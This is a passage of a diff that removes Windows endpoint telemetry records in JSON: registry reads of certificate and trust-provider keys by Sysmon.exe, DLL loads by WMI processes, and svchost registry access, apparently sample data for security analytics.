"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wbemprox.dll", - "image_path": "C:\\Windows\\System32\\wbem\\wbemprox.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "perfos.dll", - "image_path": "C:\\Windows\\System32\\perfos.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479950016, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wbemsvc.dll", - "image_path": "C:\\Windows\\System32\\wbem\\wbemsvc.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "perfproc.dll", - "image_path": "C:\\Windows\\System32\\perfproc.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479950016, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "fastprox.dll", - "image_path": "C:\\Windows\\System32\\wbem\\fastprox.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\WmiApSrv.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Wbem\\PROVIDERS\\Performance", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Wbem\\PROVIDERS\\Performance\\Performance Refreshed", - "registry_value": 